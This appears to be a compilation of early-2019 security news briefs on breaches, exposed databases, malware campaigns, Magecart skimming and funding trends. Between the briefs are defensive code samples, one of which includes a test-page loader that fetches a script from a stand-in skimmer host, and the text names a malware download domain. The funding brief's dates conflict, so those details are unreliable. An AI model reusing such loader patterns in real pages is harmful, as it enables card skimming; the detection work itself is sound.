Despite a 28% decrease in cybersecurity startups during 2017, global venture capital funding for cybersecurity rebounded with record high investments, according to Strategic Cyber Ventures.
Though last year saw $5.3 billion in cybersecurity global ventures, Strategic Cyber Ventures called this an unsustainable investment rate.
Over half of cybersecurity founders of new startups have more than a decade of executive or entrepreneurial experience, as opposed to the past two years in which there was nearly an even split between experienced founders and less-seasoned founders, the report found.
In fact, 2018 was the fifth consecutive year in which Israel enjoyed increasing round sizes at the seed stage. Additionally, the amount of funding across all stages increased, keeping the recent trend of fewer companies raising larger amounts of capital moving forward.
Though there were emerging fields among new startups in 2018, including cybersecurity solutions for cryptocurrencies and software-defined perimeter (SDP), the most overwhelmingly funded field across all stages was internet of things (IoT) security. Though most startups were within the SCADA and medical devices sub-domains, other emerging fields included threat detection, security operations, data protection and cloud security.
Nevertheless, the report said, “In cybersecurity, there are likely many zombies out there. They’ve raised big rounds, growth has slowed, perhaps due to vendor fatigue or increased competition, and now these companies can’t raise at increased valuations from prior rounds, or at all, and are being propped up by existing investors that will eventually grow weary of keeping them alive. These companies will eventually float to the surface over the next few years with less than desirable outcomes for investors and founders.”
According to Chris Ahern, principal, Strategic Cyber Ventures, “We’ve seen massive funds formed over the past few years and some of that money is making its way to cybersecurity deals. Second, we’ve seen some strong exits in the space through IPOs and M&A over the last couple of years.
“The problems aren’t going away. 2018 had several massive, high-profile breaches and we’ll continue to see this into 2018 as well as a continued discussion around privacy. The real question is whether it’s a good thing that 2018 was a record year for cybersecurity investment.”
Another California-based communications provider has announced a potential security incident: VOIPo confessed that it left unprotected, without a password, a database containing seven million call logs, six million text messages and other internal documents holding unencrypted passwords.
After security researcher Justin Paine notified the company, he wrote, “This database was promptly secured after I notified the company. I would like to thank VOIPo for their quick assistance in securing this data.”
In the security notice shared with customers, VOIPo wrote: “We were made aware of a development server that was exposed for a small window of time. When it was discovered, it was taken offline within 15 minutes of being notified by Cloudflare that they had discovered it. It primarily had some data for database load testing made up of call logs (partial numbers only), SMS messages our system flagged as SPAM and some general server log data.”
VOIPo said the dev server was isolated and no other network was at risk because additional production systems are firewalled so that any connection to those systems would not have been possible. However, these statements have been called “misleading” on Twitter.
The VOIPo database reportedly had been exposed since June 2018 and contains call and message logs dating back to May 2015. The news comes only two months after a database misconfiguration at San Diego–based Voxox leaked 26 million text messages. As was the case in the Voxox breach, if text messages containing two-factor authentication (2FA) codes or password reset links were intercepted, they could have allowed the attacker to hijack a user’s account.
“It does not take much for outsiders to find unsecured databases and access sensitive information,” said Stephan Chenette, CTO and co-founder, AttackIQ. “In fact, there are now tools designed to detect misconfigurations within cloud tools like Amazon's S3. Misconfigured security controls are an all-too-common problem. Organizations are increasingly struggling with limited and under-trained IT resources that lead to using default account passwords, unpatched systems and poorly configured network devices.”
Although VOIPo claims there is no evidence to indicate a breach occurred, “the company cannot guarantee that no unauthorized users accessed the data, especially since it was left unsecured and easily available for months,” said Ruchika Mishra, director of products and solutions, Balbix.
The vast majority of senior decision makers across the globe expect data theft and cyber-disruption to increase in 2019, according to the latest report from the World Economic Forum (WEF).
The annual Global Risks Report for 2019 uses interviews with risk experts, business leaders, academics and others to better understand the challenges facing the world economy.
Rising dependency on technology ensured cyber-related risk remained front-of-mind for respondents, both in the near and long-term.
Some 82% said they expect data and monetary theft attacks to increase in 2019, while 80% said the same for cyber-related disruption to operations and infrastructure.
A slightly smaller number anticipated an increase in fake news (69%), personal identity theft (64%) and loss of privacy to companies (63%).
Over the next decade, respondents placed data fraud/theft and cyber-attacks fourth and fifth in terms of most likely risks, while cyber-attacks and “critical information infrastructure breakdown” were placed seventh and eighth in terms of biggest potential impact.
“There were further massive data breaches in 2018, new hardware weaknesses were revealed, and research pointed to the potential uses of artificial intelligence to engineer more potent cyber-attacks,” the report noted. “Last year also provided further evidence that cyber-attacks pose risks to critical infrastructure, prompting countries to strengthen their screening of cross-border partnerships on national security grounds.”
Veeam’s regional VP for UK & Ireland, Mark Adams, claimed the report highlights the continued need for investment in cyber-threat mitigation.
“Spending time and money on thorough cybersecurity and disaster recovery planning is no longer evidence of being overly paranoid,” he added. “When disaster strikes, whether from a data breach or service outage, having these kinds of measures in place to rely on is what will separate successful businesses from struggling ones.”
However, the findings show a slight change from last year’s report, which listed cyber-attacks as the third most likely global risk.
Millions of sensitive files dating back decades have been exposed after 3TB of data on a storage server was left publicly exposed by the Oklahoma Securities Commission.
Researchers at UpGuard made the discovery on December 7 last year and it was fixed a day later by the commission, part of the state’s Department of Securities, which regulates and administers the securities trading sector.
It was first registered as publicly accessible by Shodan a week earlier.
“The data was exposed via an unsecured rsync service at an IP address registered to the Oklahoma Office of Management and Enterprise Services, allowing any user from any IP address to download all the files stored on the server,” explained the security vendor.
“The website for the Securities Commission has an UpGuard Cyber Risk score of 171 out of 950, indicating severe risk of breach. Among the issues lowering the website’s score is the use of the web server IIS 6.0, which reached end of life in July 2015, meaning no updates to address any newly discovered vulnerabilities have been released in the last three and a half years.”
The data, which dated back to 1986 and included email back-ups and virtual images, covered a broad sweep of different areas.
These included personal information such as the Social Security numbers of 10,000 brokers, and highly sensitive life insurance information on terminally ill AIDS patients.
Also exposed were system credentials which could allow an attacker to hijack Department of Securities workstations, third-party security filings, and accounts with Thawte, Symantec Protection Suite, Tivoli and others.
The leaked data also included “spreadsheets documenting the timeline for investigations by the FBI and people they interviewed,” potentially putting witnesses at risk.
“We need to stop making it so easy for hackers and bad actors who are simply using tools that have been around for years,” argued Suzanne Spaulding, Nozomi Networks adviser and former DHS under secretary.
“Hackers use a tool called Shodan that allows anyone to scan the internet, looking for devices and computers, connected to the internet, but not protected.”
A leading security researcher has warned of a major trove of breached data being shared on hacking sites, containing over 772 million unique email addresses and more than 21 million unique passwords.
Troy Hunt, owner of the Have I Been Pwned (HIBP) breached credentials site, explained that he was alerted to the collection of 12,000 files hosted on the MEGA cloud service last week.
Although the 87GB dump was subsequently removed, he was also notified of it being shared on a hacking forum under the moniker “Collection #1.”
The total collection amounted to nearly 2.7 billion rows comprised of credentials stolen from thousands of sources in multiple breaches, said Hunt.
After cleaning up the data, he reduced this figure to 772.9 million emails — the largest ever to be loaded into HIBP — and 21.2 million dehashed passwords.
“Whilst there are many legitimate breaches that I recognise in that list, that's the extent of my verification efforts and it's entirely possible that some of them refer to services that haven't actually been involved in a data breach at all,” Hunt explained.
“However, what I can say is that my own personal data is in there and it's accurate; right email address and a password I used many years ago. Fortunately, only passwords that are no longer in use, but I still feel the same sense of dismay that many people reading this will when I see them pop up again. They're also ones that were stored as cryptographic hashes in the source data breaches … but have been cracked and converted back to plain text.”
Hunt encouraged users to check whether their emails and passwords are affected, by visiting HIBP. However, they’ll have to search separately for them as the site doesn’t store paired credentials together for security reasons.
The likelihood is the data could be fed into credential stuffing programs to automatically try to unlock accounts over multiple other sites.
Hunt recommended users get a password manager to store long-and-strong unique credentials for each site.
“A password manager is also a rare exception to the rule that adding security means making your life harder,” he said.
A malicious MS Word document, titled “eml_-_PO20180921.doc,” has been found in the wild, and according to researchers at Fortinet's FortiGuard Labs, the document contains auto-executable malicious VBA code.
Victims who receive and open the document are prompted with a security warning that macros have been disabled. If the user then clicks on “enable content,” the NanoCore remote access Trojan (RAT) software is installed on the victim’s Windows system.
According to FortiGuard Labs, the NanoCore RAT was developed in the .Net framework back in 2013. Despite its continued use, the author was convicted by the FBI and sentenced to nearly three years in prison. Researchers captured a sample of this latest version (220.127.116.11), which uses NanoCore to execute malicious behavior.
Spreading through phishing campaigns that dupe victims into opening the document, the malware is downloaded from www.wwpdubai.com. Once executed, the VBA code downloads and saves an EXE file from the URL.
“I loaded CUVJN.exe with the .Net debugger dnSpy. Tracing from its main function, we can see that it loads numerous data blocks from its resource section, and then puts them together and decrypts them,” wrote researcher Xiaopeng Zhang.
In order to trace the main functions, researchers loaded CUVJN.exe with the .Net debugger dnSpy and found that it loads, puts together and then decrypts multiple data blocks from its resource section in order to get to a new PE file.
“According to my analysis, the decrypted .Net program is a daemon process. Let’s continue to trace it from its main() function. At first, it creates a Mutex and checks if the process already exists to ensure only one process of this program is running. Next, it checks if Avast is running on the victim’s system by detecting whether the “snxhk.dll” module is loaded or not. If so, it keeps waiting until it has been unloaded. Avast is an AntiVirus software, and “snxhk.dll” is one of its modules,” Zhang wrote.
Unfortunately, the daemon process is one that Zhang said he was not able to kill because it has a “ProtectMe” class, though he does provide steps for removing the malware.
Players who love to indulge in online battle should heed caution when playing Fortnite, according to researchers at Check Point who have disclosed vulnerabilities that could give a malicious actor access to a user’s account and their V-Bucks.
In addition to gaining full access to a user’s account, an attacker who exploited the vulnerability – which has now been fixed – could have eavesdropped on a player’s in-game conversations, potentially also picking up any sounds in the background where the game was being played, researchers said.
According to today’s press release, an attacker could have stolen login credentials by exploiting three flaws found in the web infrastructure of Epic Games, specifically in compromised sub-domains through which the malicious actor could intercept authentication tokens.
The attack, which reportedly could be executed in a single click, would grant an attacker the ability to purchase virtual in-game currency using the victim’s payment card details and then be sold for real money outside the game.
“Researchers were able to demonstrate the token-based authentication process used in conjunction with Single Sign-On (SSO) systems such as Facebook, Google and Xbox” and reported the vulnerability to Epic Games, the press release stated.
“Fortnite is one of the most popular games played mainly by kids. These flaws provided the ability for a massive invasion of privacy,” said Oded Vanunu, head of products vulnerability research for Check Point in a press release.
“Together with the vulnerabilities we recently found in the platforms used by drone manufacturer DJI, these flaws show how susceptible cloud applications are to attacks and breaches. These platforms are being increasingly targeted by hackers because of the huge amounts of sensitive customer data they hold. Enforcing two-factor authentication could mitigate this account takeover vulnerability,” continued Vanunu.
Still, Check Point advised players to remain vigilant and use discretion when sharing information online and cautioned that because of the increasing popularity and success of phishing campaigns, players should keep in mind that there are many dubious and dangerous links that should not be trusted.
Two security researchers working independently on different projects have discovered multiple vulnerabilities that affect multiple web hosting platforms, including the popular Bluehost, as well as Amadeus, the online reservation system used by several different airlines.
According to independent security researcher Paulos Yibelo, Bluehost, a popular web hosting platform, was riddled with vulnerabilities, including one that would allow complete account takeover.
Rated as having a high severity, the vulnerabilities grant attackers access to personally identifiable information, partial payment information and tokens that grant access to sites like WordPress, Website Planet wrote. In addition to those bugs discovered in Bluehost, Yibelo also reported several bugs in other web hosting platforms, including Dreamhost, HostGator, OVH, and iPage.
“This should serve as a warning call for those companies authenticating customers online with legacy technology. Today, account takeover is not a hard attack to deploy, and the consequences can be devastating with bad actors stealing money and products,” said Ryan Wilk, VP of customer success for NuData Security, a Mastercard company.
In related news, security researcher Noam Rotem, who was working with Safety Detective research lab, discovered a major vulnerability in Amadeus, an online booking system used by nearly half (44%) of all airlines worldwide, including United Airlines, Lufthansa, Air Canada, and many more, according to a January 15 blog post.
After receiving a message to check the passenger name record (PNR), the researchers were able to view any PNR and access customer data.
“With the PNR and customer name at our disposal, we were able to log into ELAL’s customer portal and make changes, claim frequent flyer miles to a personal account, assign seats and meals, and update the customer’s email and phone number, which could then be used to cancel/change flight reservation via customer service,” the researchers wrote.
A malicious actor would need to have a working knowledge of the PNR code in order to exploit the vulnerability, which has since been fixed.
Researchers have uncovered a twelfth Magecart group using tried-and-tested methods to disseminate the digital skimming code by infecting the supply chain.
RiskIQ, which has for several years been tracking the activity of groups using Magecart to steal customer card details, claimed the new group has managed to infect hundreds of websites so far via a third party.
This firm is Adverline, a French advertising agency. The attackers are said to have compromised a content delivery network for ads run by the company to include a stager containing the skimmer code.
This means that any website loading script from the ad agency's ad tag would inadvertently load the digital skimmer for visitors.
“Group 12 built out its infrastructure in September 2018; domains were registered, SSL certificates were set up through LetsEncrypt, and the skimming backend was installed. Group 12 doesn’t just inject the skimmer code by adding a script tag—the actors use a small snippet with a base64 encoded URL for the resource which is decoded at runtime and injected into the page,” explained Magecart in a blog post.
“The skimmer code for Group 12 has an interesting twist; it protects itself from deobfuscation and analysis by performing an integrity check on itself. The actual injection script comes in two stages, which both perform a self-integrity check.”
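A defender-side static check for the loader pattern RiskIQ describes above, added here as an example (it is not RiskIQ's, Adverline's or any Magecart group's code): it flags inline scripts that base64-decode a URL at runtime and inject it as a script tag. The allowlist, hostnames and sample markup are constructed.

```javascript
// Added example, not code from RiskIQ, Adverline or any Magecart group.
// Static heuristic for the Group 12 loader pattern: a small inline snippet that
// base64-decodes a URL at runtime and injects it as a <script>. Hostnames,
// allowlist and sample markup below are constructed for the demonstration.

const ALLOWED_HOSTS = new Set(["cdn.example-shop.test", "ads.example-agency.test"]);

// Quoted string literals that look like base64 (16+ chars, base64 alphabet, optional padding).
const B64_LITERAL = /["'`]([A-Za-z0-9+/]{16,}={0,2})["'`]/g;

function decodeBase64(s) {
  // Buffer does not throw on non-base64 input; garbage decodes to garbage and is
  // discarded later when no URL can be extracted from it.
  return Buffer.from(s, "base64").toString("utf8");
}

// Returns the hostname of the first http(s) URL inside `text`, or null.
function extractHost(text) {
  const m = text.match(/https?:\/\/[^\s"'<>]+/);
  if (!m) return null;
  try {
    return new URL(m[0]).hostname;
  } catch {
    return null;
  }
}

// Examines one script body. Every base64 literal that decodes to a URL becomes a
// finding, annotated with whether the script also decodes at runtime and creates a script element.
function analyseScript(src) {
  const runtimeDecode = /\batob\s*\(|String\.fromCharCode\s*\(/.test(src);
  const injectsScript = /createElement\s*\(\s*["']script["']\s*\)/.test(src);
  const findings = [];
  for (const m of src.matchAll(B64_LITERAL)) {
    const url = decodeBase64(m[1]);
    const host = extractHost(url);
    if (host === null) continue;
    findings.push({ host, url, allowlisted: ALLOWED_HOSTS.has(host), runtimeDecode, injectsScript });
  }
  return findings;
}

// A finding is suspicious when an unknown host is reached through the decode-and-inject pattern.
function isSuspicious(f) {
  return !f.allowlisted && f.runtimeDecode && f.injectsScript;
}

// Scans every <script> body in an HTML document and returns the suspicious hosts found.
function scanPage(html) {
  const hits = [];
  for (const m of html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)) {
    for (const f of analyseScript(m[1])) {
      if (isSuspicious(f)) hits.push(f.host);
    }
  }
  return hits;
}

// Constructed sample page: a plain ad tag, an allowlisted loader that uses the same
// base64 pattern legitimately, and a loader reaching an unknown (constructed) host.
function buildSamplePage() {
  const b64 = (u) => Buffer.from(u, "utf8").toString("base64");
  const loader = (u) =>
    `var s=document.createElement("script");s.src=atob("${b64(u)}");document.head.appendChild(s);`;
  return [
    "<html><head>",
    '<script src="https://ads.example-agency.test/tag.js"></script>',
    `<script>${loader("https://cdn.example-shop.test/checkout.js")}</script>`,
    `<script>${loader("https://skimmer-host.test/stage1.js")}</script>`,
    "</head><body></body></html>",
  ].join("\n");
}

console.log(scanPage(buildSamplePage())); // prints [ 'skimmer-host.test' ]
```

An allowlist cannot catch the case RiskIQ actually describes, a trusted ad CDN that has itself been compromised, so a check like this complements Subresource Integrity and a Content Security Policy rather than replacing them.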
RiskIQ warned that there’s the potential for thousands more businesses to be affected, given they all run the compromised ad tag.
This is the latest in a long line of Magecart activity which can be split roughly into two camps: attacks targeting firms’ websites directly, like the ones affecting BA and Newegg, and ones targeting suppliers.
Alongside this latest campaign, Magecart groups have been behind attacks on the developer Inbenta Technologies which led to Ticketmaster customers having their card data stolen.
Just this week it emerged that high street banks in the UK have been sending out new cards to potentially affected customers, months after the incident was first reported.
Two Ukrainian nationals have been charged with hacking into the Securities and Exchange Commission (SEC) and stealing sensitive information for use in insider trading.
Artem Radchenko, 27, and Oleksandr Ieremenko, 26, both from Kiev, were charged with 16 counts including securities fraud conspiracy, wire fraud conspiracy, computer fraud conspiracy, wire fraud and computer fraud.
They’re alleged to have targeted the SEC’s Electronic Data Gathering, Analysis and Retrieval (EDGAR) system, which stores documents related to company disclosures including test filings made before announcements go public.
These filings often contain information similar to that of the official final filing, meaning the two alleged hackers could get their hands on sensitive info before it went public to gain an advantage on the markets.
They’re alleged to have used a variety of tactics to obtain unauthorized access to the EDGAR servers, including directory traversal, phishing and malware. They’re then said to have copied the information to a server in Lithuania.
The Ukrainians recruited traders to their scheme, who used the stolen information to make over $4m in profits, according to the Department of Justice.
For example, they’re alleged to have bought up $2.4m worth of shares in a public company based on information contained in a stolen test filing about its upcoming financials. They then sold these shares for a $270,000 profit over the next day after the company announced it expected record earnings for 2016.
“The defendants allegedly orchestrated sophisticated computer intrusions to steal non-public information from the SEC, compromising the integrity of the market and depriving honest investors of a level playing field,” said assistant attorney general Brian Benczkowski. “The Department of Justice will aggressively pursue and prosecute those who attack our financial markets and seek to profit unfairly, no matter where such offenders reside.”
The charges carry a potential maximum sentence of 25 years behind bars and a $500,000 fine, or twice the gain or loss from the relevant offenses.
Ieremenko has been in trouble before, charged in 2015 for his part in an international conspiracy to hack and steal non-public sensitive market information from three newswire organizations, using the same techniques.
A total of 10 defendants have been charged as part of the latest conspiracy.
The UK’s National Cyber Security Centre (NCSC) has urged organizations still on Windows 7 to plan now for the end of extended support in a year’s time.
The GCHQ arm reminded IT managers that the operating system will no longer receive free updates from January 14 2020.
That will mean any machines still running then could be exposed to a greater risk of malware, and potentially unreliable systems.
The NCSC drew parallels with the end-of-support for Windows XP in 2014.
“It wasn’t long after that before exploitation of the final version of the platform became fairly widespread. Malware can spread much more easily on obsolete platforms because, without security updates, known vulnerabilities will remain unpatched. As a result, it’s crucial to move away from them as quickly as possible,” it explained.
“We know there are costs involved in keeping up to date. However, doing so is one of the most effective ways of keeping your networks and devices secure - this is why planning your upgrades far in advance is especially important.”
For organizations unable for any reason to migrate swiftly to Windows 10 — for example if there are compatibility issues with legacy software — the NCSC has listed a few key short-term recommendations.
These include preventing access to untrusted services and removable media, converting systems to thin clients, removing access for remote workers and applying anti-malware and intrusion detection tools.
For those businesses keen to remain on Windows 7 beyond January 14 2020, Microsoft is also offering Extended Security Updates (ESUs) which will be costed per device and increase in costs every year until January 2023.
Another option is to buy the Windows Virtual Desktop service, virtualizing Windows 7 on Azure VMs. This option comes with free ESUs but will also be available only for three years.
Despite the burgeoning IoT market, organizations made limited progress on IoT security in 2018, according to a new report from Gemalto. Though there is evidence of incremental improvements, security measures are being outpaced by the rapid growth of IoT, which is on track to hit 20 billion devices by 2023.
The survey queried 950 IT and business decision-makers with awareness of IoT in their organization in 2018. Of those, only 48% of companies said that they have the ability to detect whether their IoT devices have suffered a breach; however, 90% of respondents believe that security is a major concern for their customers.
According to the report, more than half (54%) of consumers fear that their privacy may be compromised with IoT devices, yet only 14% of the survey participants see protecting customer privacy by securing IoT devices as an ethical responsibility.
“Given the increase in the number of IoT-enabled devices, it’s extremely worrying to see that businesses still can’t detect if they have been breached,” said Jason Hart, CTO, data protection at Gemalto, in a press release. “With no consistent regulation guiding the industry, it’s no surprise the threats – and, in turn, vulnerability of businesses – are increasing. This will only continue unless governments step in now to help industry avoid losing control.”
More than a third (38%) of participants said they experience privacy challenges associated with collecting large amounts of IoT data. Still, more organizations have started using passwords to protect IoT devices. While 63% of organizations said they used passwords in 2017, the number of positive responses rose to 66% in 2018.
“Businesses are clearly feeling the pressure of protecting the growing amount of data they collect and store,” Hart said. “But while it’s positive they are attempting to address that by investing in more security, such as blockchain, they need direct guidance to ensure they’re not leaving themselves exposed. In order to get this, businesses need to be putting more pressure on the government to act, as it is them that will be hit if they suffer a breach.”
Another ransomware attack has made headlines with the city of Del Rio, Texas, announcing on January 10, 2019, that the servers at City Hall were disabled, according to a press release.
“The first step in addressing the issue, was for the City’s M.I.S. (Management Information Services) Department to isolate the ransomware which necessitated turning off the internet connection for all city departments and not allowing employees to log into the system. Due to this, transactions at City Hall are being done manually with paper.”
As has been the alternative method of communication for many organizations that have been impacted by cyber-attacks, Del Rio turned to social media, using Facebook to inform citizens of alternative payment options available to them.
After reporting the attack to the FBI, Del Rio was referred to the Secret Service. “The City is diligently working on finding the best solution to resolve this situation and restore the system. We ask the public to be patient with us as we may be slower in processing requests at this time,” the press release said.
At the time of writing this, the website for the city of Del Rio was up and running, though there is no word on the full scope of the attack. Infosecurity has contacted the city, and this story will be updated with any response.
“The growing number of exploit kits and malware at their disposal is emboldening malicious actors to attack organizations with a rich trove of consumer data,” said Mike Bittner, digital security and operations manager at The Media Trust.
“Government organizations, in particular city governments, are prime targets; they not only process a lot of citizen and business data but are also less secure as tighter budgets severely limit what IT updates they can carry out. Bad actors have no doubt put the 89,000 local governments across the country in their cross hairs. It is just a matter of time before many of these governments realize they’ve been hacked.”
As the US inches toward a full month of a government shutdown, concerns over the impact on national security and cybersecurity continue to mount, and according to security experts from Juniper Networks, Untangle and Vectra, the shutdown may affect government IT recruiting and hiring.
With the skills gap being one of the hurdles every company must clear in order to mature in their overall cybersecurity posture, most organizations are trying to get more creative when it comes to recruitment. The government, though, is in its 25th day of a shutdown.
“The biggest impact of the shutdown, in my opinion, is that furloughing cybersecurity analysts creates a vulnerability for government networks. As we all know, the top problem in security today is the shortage of trained cybersecurity professionals, and the cybersecurity skills shortage was already getting worse in 2018 with millions of unfilled cybersecurity jobs,” said Nick Bilogorskiy, cybersecurity strategist at Juniper Networks.
The problem is exacerbated because some staff are furloughed with the shutdown. As was reported by Infosecurity last week, attackers can potentially intensify their activity and exploit security gaps and vulnerabilities resulting from the shutdown. When considering the long-term ramifications, Bilogorskiy said it’s likely that the government will lose valuable cybersecurity talent to the private sector.
“During prior shutdowns, recruiting and hiring efforts have certainly been impacted, as these are not typically considered essential functions,” said Dave Mihelcic, federal chief technology and strategy officer for Juniper Networks and former chief technology officer of Defense Information Systems Agency (DISA).
“Perhaps the more significant challenge posed by these shutdowns was the lasting impressions they made on young IT professionals," Mihelcic continued. "Undoubtedly IT job seekers had a more negative view of federal employment due to the shutdown. Likewise the most talented IT professionals in federal service were left with lasting questions about their future that would cause some to seek outside opportunities.”
The problem isn't limited in scope, either. Yes, expired certificates are a problem, but collaboration between the public and private sector is critical to strong cyber-defense. "With only a skeleton crew at the helm, data sharing and rapid response can fall by the wayside, leaving our nation vulnerable to cyber threats and attacks. The longer the shutdown continues, the more opportunity there is for both private and state-sponsored attackers to take advantage of any possible lapses in oversight,” said Heather Paunet, vice president of product management at Untangle.
Government agencies have often lost potential talent to the salary battle with private industry, but the biggest concern of the government shutdown is that this type of instability would hamper the federal government’s ability to attract and retain good cybersecurity talent, according to Chris Morales, head of security analytics at Vectra.
“With the number of available roles in the private sector that pay with much more lucrative salaries and benefits, it’s going to just get harder for government agencies to compete. If anyone is in need of more automation and efficiency in security operations processes, it will be these federal agencies.”
Two major UK high street banks have started to send out replacement cards for some of their customers, nine months after one lender reported fraudulent activity to Ticketmaster.
Customers of NatWest and RBS have taken to social media to vent their frustration over the way the incident has been handled.
Some complained that this is the first they’ve heard of the breach, which Ticketmaster reported in June and is believed to have affected in the region of 40,000 UK customers.
Others wanted to know if the letter sent by their bank was genuine.
“During 2018 Ticketmaster announced that they suffered a data breach between September 2017 and June 2018, which included data for some of our customers; because of this, we are replacing all customer debit and credit cards that may have been compromised by this breach,” explained a Twitter response to one such query by NatWest.
The banks say they are issuing the replacement cards as a precaution, meaning there is no confirmation that these customers' details were actually accessed in the incident.
However, the lengthy delay contrasts starkly with banking start-up Monzo, which asked Mastercard to issue replacement cards for all of its affected customers back in April last year.
In fact, the bank wrote in a blog post that it had initially contacted the ticketing giant to inform it of a potential breach, a warning that appeared to have gone unheeded for nearly two months.
Breaches are often first detected by card issuers rather than by the merchant: an issuer can correlate fraud reports across its customers' cards and look for a merchant that the compromised cards have in common (a common point of purchase), together with the time window in which those cards were used there.
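The issuer-side correlation described above, as an added example (this is not Monzo's, the banks' or the article's own tooling). Given constructed transaction records and a set of cards on which fraud has been confirmed, it ranks merchants by how much of the fraud population they cover and by lift over the base fraud rate, and reports the exposure window at the top candidate. The merchant names, card IDs and dates are all constructed; the "supermarket" entry exists only to show why coverage alone is not enough.

```python
from collections import defaultdict
from datetime import date

# Constructed transaction records: (card_id, merchant, transaction_date). Not real data.
TRANSACTIONS = [
    ("card-01", "ticket-vendor", date(2017, 10, 3)),
    ("card-01", "grocer",        date(2017, 10, 5)),
    ("card-02", "ticket-vendor", date(2017, 11, 12)),
    ("card-02", "fuel",          date(2017, 11, 20)),
    ("card-03", "ticket-vendor", date(2018, 1, 8)),
    ("card-03", "grocer",        date(2018, 1, 9)),
    ("card-04", "ticket-vendor", date(2018, 2, 14)),
    ("card-05", "grocer",        date(2018, 2, 1)),
    ("card-05", "fuel",          date(2018, 2, 3)),
    ("card-06", "grocer",        date(2018, 2, 6)),
    ("card-07", "fuel",          date(2018, 3, 1)),
    ("card-07", "grocer",        date(2018, 3, 2)),
    ("card-08", "ticket-vendor", date(2018, 3, 9)),
    ("card-08", "fuel",          date(2018, 3, 10)),
]
# A merchant every card uses: full coverage but no lift, so it must not be picked as the breach point.
TRANSACTIONS += [(f"card-0{i}", "supermarket", date(2018, 3, i)) for i in range(1, 9)]

# Cards on which the issuer has confirmed unauthorised spend (constructed).
FRAUD_CARDS = {"card-01", "card-02", "card-03", "card-04"}


def common_point_of_purchase(transactions, fraud_cards):
    """Rank merchants as candidate breach points.

    Returns tuples (merchant, fraud_cards_seen, all_cards_seen, coverage, lift), sorted best first.
    coverage: share of the fraud-reported cards that transacted at the merchant.
    lift:     fraud rate among the merchant's cards divided by the overall fraud rate.
    The common point of purchase is the merchant with coverage near 1.0 AND lift well above 1.0.
    """
    cards_by_merchant = defaultdict(set)
    all_cards = set()
    for card, merchant, _ in transactions:
        cards_by_merchant[merchant].add(card)
        all_cards.add(card)
    fraud_cards = set(fraud_cards) & all_cards
    if not fraud_cards:
        return []
    base_rate = len(fraud_cards) / len(all_cards)
    ranked = []
    for merchant, cards in cards_by_merchant.items():
        hit = cards & fraud_cards
        coverage = len(hit) / len(fraud_cards)
        lift = (len(hit) / len(cards)) / base_rate
        ranked.append((merchant, len(hit), len(cards), coverage, lift))
    ranked.sort(key=lambda r: (r[3], r[4]), reverse=True)
    return ranked


def exposure_window(transactions, merchant, fraud_cards):
    """Earliest and latest dates on which a fraud-reported card was used at the merchant."""
    dates = [d for card, m, d in transactions if m == merchant and card in fraud_cards]
    return (min(dates), max(dates)) if dates else None


if __name__ == "__main__":
    ranking = common_point_of_purchase(TRANSACTIONS, FRAUD_CARDS)
    for merchant, hit, seen, coverage, lift in ranking:
        print(f"{merchant:14s} fraud cards {hit}/{seen}  coverage {coverage:.2f}  lift {lift:.2f}")
    top = ranking[0][0]
    print("candidate common point of purchase:", top, exposure_window(TRANSACTIONS, top, FRAUD_CARDS))
```

In the constructed data the ticket vendor is used by all four fraud cards and has a fraud rate 1.6 times the base rate, while the supermarket also covers all four but at exactly the base rate, which is why the ranking key is coverage first and lift second rather than coverage alone. The exposure window (here October 2017 to February 2018) is what an issuer hands to the merchant when it reports a suspected compromise.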
The breach itself was the result of digital skimming code of the kind attributed to the Magecart groups being injected into a customer-support chat script supplied by third-party developer Inbenta Technologies, which Ticketmaster loaded on its payments page.
The latter claimed that Ticketmaster had implemented it incorrectly on its payments page.
“We were unaware of this, and would have advised against doing so had we known, as it presents a point of vulnerability,” it said at the time.
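A skimmer delivered through a vendor's script works because the page trusts whatever that vendor's host serves today. The check below is an added example (not Ticketmaster's or Inbenta's code, and the checkout page, hosts and script bodies are all constructed): it audits a page for scripts loaded from hosts other than the site's own, flags those without a Subresource Integrity hash, and shows that any modification to a pinned script, such as an appended skimmer, fails the integrity check.

```python
import base64
import hashlib
import hmac
from html.parser import HTMLParser
from urllib.parse import urlparse


def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Value to put in a <script integrity="..."> attribute for exactly this body."""
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def sri_matches(integrity: str, body: bytes) -> bool:
    """Browser semantics: the attribute may list several hashes; any one match passes."""
    for token in integrity.split():
        algo, _, b64 = token.partition("-")
        if algo not in ("sha256", "sha384", "sha512"):
            continue  # browsers ignore unknown algorithms
        if hmac.compare_digest(base64.b64decode(b64), hashlib.new(algo, body).digest()):
            return True
    return False


class _ScriptTags(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.tags.append(dict(attrs))


def audit_third_party_scripts(html: str, first_party_host: str):
    """Every script loaded from a host other than ours, with its integrity attribute (or None)."""
    parser = _ScriptTags()
    parser.feed(html)
    findings = []
    for attrs in parser.tags:
        src = attrs.get("src")
        if not src:
            continue
        host = urlparse(src).hostname
        if host is None or host == first_party_host or host.endswith("." + first_party_host):
            continue  # relative URL or our own host
        findings.append({"src": src, "host": host, "integrity": attrs.get("integrity")})
    return findings


def unpinned_third_party(html: str, first_party_host: str):
    """Third-party script URLs that carry no integrity attribute at all."""
    return [f["src"] for f in audit_third_party_scripts(html, first_party_host) if not f["integrity"]]


# Constructed checkout page and script bodies (hypothetical hosts under .invalid).
PSP_JS = b"window.pay = function (form) { /* tokenise card fields */ };\n"
PSP_SRI = sri_hash(PSP_JS)
CHECKOUT_HTML = f"""
<html><body>
<form id="card-form" action="/pay" method="post"> ... </form>
<script src="/static/checkout.js"></script>
<script src="https://cdn.chatbot-vendor.invalid/widget.js"></script>
<script src="https://js.psp.invalid/v1.js" integrity="{PSP_SRI}" crossorigin="anonymous"></script>
</body></html>
"""
# From the hash's point of view a skimmer appended to the vendor file is just a changed body.
TAMPERED_PSP_JS = PSP_JS + b"document.forms[0].onsubmit = function () { /* exfiltrate fields */ };\n"


if __name__ == "__main__":
    for finding in audit_third_party_scripts(CHECKOUT_HTML, "shop.example"):
        print(finding)
    print("unpinned third-party scripts:", unpinned_third_party(CHECKOUT_HTML, "shop.example"))
    print("original body passes SRI:", sri_matches(PSP_SRI, PSP_JS))
    print("tampered body passes SRI:", sri_matches(PSP_SRI, TAMPERED_PSP_JS))
```

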